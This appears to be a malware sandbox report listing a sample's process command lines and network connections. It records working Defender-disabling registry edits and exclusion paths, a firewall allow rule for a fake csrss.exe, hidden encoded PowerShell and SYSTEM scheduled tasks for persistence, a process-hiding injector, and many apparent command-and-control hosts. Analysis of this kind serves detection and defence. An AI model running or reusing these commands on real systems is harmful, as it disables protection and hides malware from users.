"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gQoElPrcH" /SC once /ST 00:57:10 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gQoElPrcH"

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gQoElPrcH"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BAnwxolbGpCzXNxkj" /SC once /ST 21:03:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe\" XT /iCsite_idiFA 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "BAnwxolbGpCzXNxkj"

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe

C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\AQBKmYi.exe XT /iCsite_idiFA 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWycNackLSywaqkmgR"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ByWuwrOBU\PWRvhM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qbSDwEgyNYPZlGA" /V1 /F

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qbSDwEgyNYPZlGA2" /F /xml "C:\Program Files (x86)\ByWuwrOBU\AvxxVxR.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qbSDwEgyNYPZlGA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "yJQYurcljWrTFb" /F /xml "C:\Program Files (x86)\RVqmAwyyxwiU2\ACMxZui.xml" /RU "SYSTEM"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "MrNSpwukvDtlP2" /F /xml "C:\ProgramData\wGkeBUkfAIhWvVVB\lmalwfO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "qnWLzqfHNJaEQUiUn2" /F /xml "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\uvpBegG.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "FBXQMyjqJGqSqkHthaW2" /F /xml "C:\Program Files (x86)\DUGaRsFaSnqjC\GDwEUmD.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QhciBzJOokLnyYZub" /SC once /ST 17:08:32 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll\",#1 /Pbsite_idsVj 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QhciBzJOokLnyYZub"

\??\c:\windows\system32\rundll32.EXE

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll",#1 /Pbsite_idsVj 385118

C:\Windows\SysWOW64\rundll32.exe

c:\windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\GYQTtcim\mEUtEMq.dll",#1 /Pbsite_idsVj 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

\??\c:\windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

Network

Country Destination Domain Proto
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 167.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 affordcharmcropwo.shop udp
US 172.67.181.34:443 affordcharmcropwo.shop tcp
US 8.8.8.8:53 cleartotalfisherwo.shop udp
US 104.21.72.132:443 cleartotalfisherwo.shop tcp
US 8.8.8.8:53 34.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 worryfillvolcawoi.shop udp
US 172.67.199.191:443 worryfillvolcawoi.shop tcp
US 8.8.8.8:53 enthusiasimtitleow.shop udp
US 104.21.18.233:443 enthusiasimtitleow.shop tcp
US 8.8.8.8:53 132.72.21.104.in-addr.arpa udp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 191.199.67.172.in-addr.arpa udp
US 8.8.8.8:53 dismissalcylinderhostw.shop udp
US 172.67.205.132:443 dismissalcylinderhostw.shop tcp
US 8.8.8.8:53 diskretainvigorousiw.shop udp
US 172.67.211.165:443 diskretainvigorousiw.shop tcp
US 8.8.8.8:53 233.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 132.205.67.172.in-addr.arpa udp
US 8.8.8.8:53 communicationgenerwo.shop udp
US 104.21.83.19:443 communicationgenerwo.shop tcp
US 8.8.8.8:53 pillowbrocccolipe.shop udp
US 104.21.47.56:443 pillowbrocccolipe.shop tcp
US 8.8.8.8:53 165.211.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.83.21.104.in-addr.arpa udp
US 8.8.8.8:53 56.47.21.104.in-addr.arpa udp
RU 193.233.132.167:80 193.233.132.167 tcp
DE 185.172.128.33:8970 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 productivelookewr.shop udp
US 172.67.150.207:443 productivelookewr.shop tcp
US 8.8.8.8:53 tolerateilusidjukl.shop udp
US 172.67.147.41:443 tolerateilusidjukl.shop tcp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 207.150.67.172.in-addr.arpa udp
US 8.8.8.8:53 41.147.67.172.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 shatterbreathepsw.shop udp
US 172.67.169.43:443 shatterbreathepsw.shop tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 shortsvelventysjo.shop udp
US 104.21.16.225:443 shortsvelventysjo.shop tcp
US 8.8.8.8:53 43.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 234.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 incredibleextedwj.shop udp
US 104.21.86.106:443 incredibleextedwj.shop tcp
US 8.8.8.8:53 alcojoldwograpciw.shop udp
US 104.21.48.243:443 alcojoldwograpciw.shop tcp
US 8.8.8.8:53 225.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 106.86.21.104.in-addr.arpa udp
US 8.8.8.8:53 243.48.21.104.in-addr.arpa udp
US 8.8.8.8:53 liabilitynighstjsko.shop udp
US 104.21.44.3:443 liabilitynighstjsko.shop tcp
RU 185.215.113.67:26260 tcp
US 8.8.8.8:53 3.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 demonstationfukewko.shop udp
US 172.67.147.169:443 demonstationfukewko.shop tcp
US 8.8.8.8:53 169.147.67.172.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 5.42.65.67:48396 tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
FR 52.143.157.84:80 52.143.157.84 tcp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 net.geo.opera.com udp
US 8.8.8.8:53 yip.su udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 104.21.79.77:443 yip.su tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 84.157.143.52.in-addr.arpa udp
US 8.8.8.8:53 59.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 175.132.233.193.in-addr.arpa udp
US 8.8.8.8:53 77.79.21.104.in-addr.arpa udp
US 172.67.193.79:443 realdeepai.org tcp
US 172.67.193.79:443 realdeepai.org tcp
US 8.8.8.8:53 jonathantwo.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
RU 77.221.151.47:80 77.221.151.47 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 79.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 131.176.67.172.in-addr.arpa udp
US 8.8.8.8:53 47.151.221.77.in-addr.arpa udp
DE 185.172.128.90:80 185.172.128.90 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
RU 193.233.132.234:80 193.233.132.234 tcp
RU 193.233.132.175:80 193.233.132.175 tcp
RU 193.233.132.234:80 193.233.132.234 tcp
US 8.8.8.8:53 skategirls.org udp
DE 185.172.128.228:80 185.172.128.228 tcp
US 172.67.193.79:443 realdeepai.org tcp
DE 185.172.128.59:80 185.172.128.59 tcp
US 172.67.193.79:443 realdeepai.org tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 8.8.8.8:53 228.128.172.185.in-addr.arpa udp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
RU 193.233.132.167:80 193.233.132.167 tcp
US 8.8.8.8:53 note.padd.cn.com udp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 106.76.97.176.in-addr.arpa udp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
RO 176.97.76.106:80 note.padd.cn.com tcp
DE 185.172.128.228:80 tcp
NL 185.26.182.124:443 tcp
NL 185.26.182.124:443 tcp
NL 82.145.217.121:443 tcp
NL 185.26.182.117:443 tcp
NL 82.145.216.15:443 tcp
US 2.16.106.156:443 tcp
NL 185.26.182.124:443 tcp
US 8.8.8.8:53 udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 104.26.9.59:443 tcp
US 34.117.186.192:443 tcp
US 8.8.8.8:53 59.9.26.104.in-addr.arpa udp
US 104.26.9.59:443 tcp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
DE 185.172.128.228:80 tcp
US 34.117.186.192:443 tcp
US 20.157.87.45:80 tcp
RU 5.42.66.10:80 tcp
DE 185.172.128.76:80 tcp
US 8.8.8.8:53 76.128.172.185.in-addr.arpa udp
DE 185.172.128.76:80 tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.51:443 download.iolo.net tcp
US 8.8.8.8:53 51.56.244.143.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
RU 91.215.85.66:15647 tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 66.85.215.91.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 199.232.210.172:80 tcp
US 199.232.210.172:80 tcp
US 199.232.210.172:80 tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
NL 185.26.182.117:443 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 download5.operacdn.com udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp
RU 77.221.151.47:8080 tcp
DE 185.172.128.19:80 185.172.128.19 tcp
